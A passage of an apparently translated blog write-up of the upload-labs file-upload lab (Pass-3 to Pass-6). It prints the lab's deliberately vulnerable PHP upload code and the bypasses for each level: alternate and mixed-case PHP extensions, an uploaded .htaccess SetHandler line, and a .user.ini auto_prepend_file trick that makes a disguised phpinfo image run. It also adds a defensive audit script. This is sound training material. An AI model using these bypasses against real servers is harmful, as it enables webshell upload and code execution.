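                     f"pass02={'accept' if pass02_accepts(p) else 'reject'} "
                     f"hardened={'accept' if ok else 'reject'} reason={why}")
    return lines


if __name__ == "__main__":
    for line in audit(RAW_REQUEST):
        print(line)
```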
<h2 id="Pass-3-黑名单绕过"><a href="#Pass-3-黑名单绕过" class="headerlink" title="Pass-3-Blacklist bypass"></a>Pass-3-Blacklist bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//remove trailing dots from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lowercase</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//strip the string ::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>A blacklist forbids files with the <code>.asp,.aspx,.php,.jsp</code> extensions; the variable <code>$deny_ext</code> declares the forbidden files, and the upload is validated on the back end by file extension.</p>
<p>Mixed-case and doubled extensions both fail here; eventually the upload succeeds with php3 and php5.</p>
<p>In our test environment, however, php3 and php5 files upload successfully but do not execute, because PHP in our environment has support for php3, php5 … disabled by default, so we need to enable it manually.<br>Edit <code>/etc/php-fpm.d/www.conf</code> and find:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">security.limit_extensions = .php .php3 .php4 .php5 .php7</span><br></pre></td></tr></table></figure>
<p>Remove the leading comment marker <code>;</code>:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520471-378019-upload3-6.png" alt="img"><br>Then upload an info.php5 file:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520133-670385-upload3-3.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520205-359705-upload3-5.png" alt="img"></p>
<h2 id="Pass-4-htaccess绕过"><a href="#Pass-4-htaccess绕过" class="headerlink" title="Pass-4-.htaccess绕过"></a>Pass-4-.htaccess绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span 
class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span 
class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The hint lists the forbidden extensions:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf</span><br></pre></td></tr></table></figure>
<p>The source really does refuse uploads with the extensions listed above. What can still be uploaded is a .htaccess file, which Apache honours by default.</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Prerequisites:</span><br><span class="line">1. The mod_rewrite module is enabled.</span><br><span class="line">2. AllowOverride All</span><br></pre></td></tr></table></figure>
<p>So first upload a .htaccess file with the following content:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>This makes every file in the current directory be handled by the PHP interpreter. Any file whose content is valid PHP is executed as PHP; anything else raises a parse error. After that an image webshell or a one-line shell can be uploaded.</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002559506.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002606544.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002612809.png" alt="在这里插入图片描述"></p>
<p>In an nginx environment this does not work by default: nginx never loads .htaccess, so the file is uploaded but never applied.<br>To reproduce the effect there, the nginx configuration has to be edited by hand to include the .htaccess file:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">include</span> /var/www/.htaccess;</span><br></pre></td></tr></table></figure>
<h2 id="Pass-05-user-ini"><a href="#Pass-05-user-ini" class="headerlink" title="Pass-05-.user.ini"></a>Pass-05-.user.ini</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span 
class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//strip the trailing dot from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lowercase</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"> 
</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The blacklist in this code is strict: it is essentially an upgraded Pass04 that additionally rejects .htaccess uploads.<br>Going over the list repeatedly, the extensions that are still not restricted include .php7 and .ini.</p>
<blockquote>
<p><strong>.user.ini</strong>:<br>Since PHP 5.3.0, PHP supports .htaccess-style INI files on a per-directory basis. These files are processed only by the CGI/FastCGI SAPI. This feature makes the PECL htscanner extension obsolete. If you use Apache, .htaccess files have the same effect.</p>
<p>Besides the main php.ini, PHP also scans for INI files in each directory, starting from the directory of the PHP file being executed and going up to the web root (as given by $_SERVER['DOCUMENT_ROOT']). If the PHP file is outside the web root, only that directory is scanned.</p>
<p>Only INI settings with the PHP_INI_PERDIR and PHP_INI_USER modes are recognised in .user.ini-style INI files.</p>
<p>Two new INI directives, user_ini.filename and user_ini.cache_ttl, control the use of user INI files.</p>
<p>user_ini.filename sets the file name PHP looks for in each directory; if it is set to an empty string PHP does not search at all. The default is .user.ini.</p>
<p>user_ini.cache_ttl controls how often the user INI files are re-read. The default is 300 seconds (5 minutes).</p>
</blockquote>
<p>As is well known, php.ini is PHP's configuration file; the directives in a .user.ini are treated by PHP as configuration too, which is what turns it into a PHP file-parsing vulnerability.<br>Pass05 is the most recently added level. It feels like it was added to make up for Pass04 only being reproducible on Apache, because the .user.ini technique of Pass05 is very easy to reproduce on nginx.</p>
<p>Triggering the .user.ini parsing vulnerability does, however, require three preconditions:</p>
<ul>
<li>The server-side scripting language is PHP</li>
<li>The server runs PHP in CGI/FastCGI mode</li>
<li>The upload directory contains an executable PHP file</li>
</ul>
<blockquote>
<p><strong>What is CGI</strong><br>CGI stands for Common Gateway Interface. It is a mechanism through which an HTTP server talks to programs and services on other machines; CGI programs must run on a network server.</p>
<p>The main drawback of the traditional CGI interface is poor performance: every time the HTTP server meets a dynamic program it has to start the interpreter afresh to run it, and only then is the result returned to the HTTP server. Under heavy concurrent load this is close to unusable, which is why FastCGI was born. The traditional CGI interface also has a poor security record, so it is rarely used nowadays.</p>
<p><strong>What is FastCGI</strong><br>FastCGI is a scalable, high-speed interface for communication between an HTTP server and dynamic scripting languages (on Linux the FastCGI interface is a socket, which can be either a Unix file socket or an IP socket). Its main advantage is that it decouples the dynamic language from the HTTP server. Most popular HTTP servers support FastCGI, including Apache, Nginx and Lighttpd.</p>
<p>FastCGI is likewise supported by many scripting languages, PHP among them. The FastCGI interface uses a client/server architecture: it separates the HTTP server from the script server and can start one or more script-parsing daemons on the script server. When the HTTP server meets a dynamic program it hands it straight to a FastCGI process for execution and then returns the result to the browser. This lets the HTTP server concentrate on static requests, or simply relay the dynamic script server's results to the client, which greatly improves the performance of the whole application.</p>
</blockquote>
<p>The nginx configuration:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="section">location</span> <span class="regexp">~ \.php</span>{</span><br><span class="line"> <span class="attribute">root</span> /var/upload;</span><br><span class="line"> <span class="attribute">fastcgi_pass</span> <span class="number">127.0.0.1:9000</span>;</span><br><span class="line"> <span class="attribute">fastcgi_index</span> index.php;</span><br><span class="line"> <span class="attribute">fastcgi_param</span> SCRIPT_FILENAME <span class="variable">$document_root</span><span class="variable">$fastcgi_script_name</span>;</span><br><span class="line"> <span class="attribute">include</span> fastcgi_params;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>As for the third precondition, the Pass05 hint tells us to look at readme.php:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="keyword">echo</span> <span class="string">"该目录是上传文件保存,该文件为系统说明文件,请勿删除!"</span>;<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>This confirms that the upload directory contains an executable PHP file, so every condition for triggering the .user.ini parsing vulnerability is met.</p>
<p><strong>Method one: in my environment a php7 file can be uploaded directly.</strong><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606151-689078-upload-labs5-3.png" alt="img"><br><strong>Method two: the .user.ini file.</strong><br>First create a .user.ini file with the following content:</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=pass5.png</span><br></pre></td></tr></table></figure>
<p>Upload the .user.ini:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606357-491352-upload-labs5-4.png" alt="img"></p>
<p>Create a new pass5.php with the following content:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Rename pass5.php to pass5.png and upload it:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606500-656200-upload-labs5-5.png" alt="img"></p>
<p>After waiting 5 minutes (the default user_ini.cache_ttl), visit readme.php:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606555-543651-upload-labs5-6.png" alt="img"></p>
<p>From this point on, any file named in .user.ini whose content is valid PHP is executed whenever readme.php runs.</p>
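<p>As an added example that is not part of upload-labs or this write-up, the PHP script below audits an upload directory for the two ingredients the Pass-04/Pass-05 techniques depend on: a per-directory configuration file (.htaccess, or a .user.ini whose auto_prepend_file/auto_append_file directives are singled out) and a non-PHP file whose body carries a PHP open tag. The sample tree it builds in a temporary directory is constructed to mirror this level; the tag names and the 64 KiB read window are choices made for this example.</p>

```php
<?php
// Added example (not upload-labs code): audit an upload directory for the
// ingredients behind Pass-04/Pass-05, i.e. a per-directory config file
// (.htaccess / .user.ini) and a non-PHP file that actually contains PHP.
// Returns [relative path, tag, detail] triples so it can feed a monitoring job.

function audit_upload_dir(string $dir): array
{
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $path => $info) {
        if (!$info->isFile()) {
            continue;
        }
        $name = $info->getFilename();
        $rel  = substr($path, strlen($dir) + 1);

        // 1. Apache reads .htaccess (Pass-04); nothing in an upload tree needs one.
        if ($name === '.htaccess') {
            $findings[] = [$rel, 'apache-config', 'per-directory Apache config in upload tree'];
            continue;
        }

        // 2. PHP-FPM/CGI reads .user.ini (Pass-05). Report every directive it sets and
        //    single out auto_prepend_file / auto_append_file, the two that make an
        //    existing .php file execute the contents of another file.
        if ($name === '.user.ini') {
            $ini = parse_ini_file($path, false, INI_SCANNER_RAW) ?: [];
            foreach ($ini as $key => $value) {
                $tag = in_array($key, ['auto_prepend_file', 'auto_append_file'], true)
                    ? 'php-config-include'
                    : 'php-config';
                $findings[] = [$rel, $tag, "$key=$value"];
            }
            continue;
        }

        // 3. An "image" whose first 64 KiB contains a PHP open tag (the pass5.png case).
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (!in_array($ext, ['php', 'phtml', 'php7'], true)) {
            $head = file_get_contents($path, false, null, 0, 65536);
            if ($head !== false && preg_match('/<\?(php\b|=)/i', $head)) {
                $findings[] = [$rel, 'php-in-non-php-file', "PHP open tag inside .$ext"];
            }
        }
    }
    return $findings;
}

// --- Constructed sample tree mirroring the Pass-05 walkthrough above. ---
$root = sys_get_temp_dir() . '/upload_audit_' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents("$root/readme.php", '<?php echo "system file"; ?>');
file_put_contents("$root/.user.ini", "auto_prepend_file=pass5.png\n");
file_put_contents("$root/pass5.png", '<?php phpinfo(); ?>');
file_put_contents("$root/photo.jpg", "\xFF\xD8\xFF\xE0 not really a JPEG body");

// readme.php and photo.jpg produce no finding; .user.ini and pass5.png do.
foreach (audit_upload_dir($root) as [$file, $tag, $detail]) {
    printf("%-10s %-20s %s\n", $file, $tag, $detail);
}

// Remove the constructed tree again.
foreach (['readme.php', '.user.ini', 'pass5.png', 'photo.jpg'] as $f) {
    unlink("$root/$f");
}
rmdir($root);
```

Running this from cron only catches the artefacts after the fact; the third precondition the write-up lists (an executable PHP file inside the upload directory) is removed by not routing the upload location to FastCGI at all.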
<h2 id="Pass-6-大小写绕过"><a href="#Pass-6-大小写绕过" class="headerlink" title="Pass-6-大小写绕过"></a>Pass-6-Case bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//strip the trailing dot from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"> 
</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Compared with Pass-4, .htaccess is now filtered, but the line that converts the extension to lowercase has been removed, so a mixed-case extension bypasses the blacklist.</p>
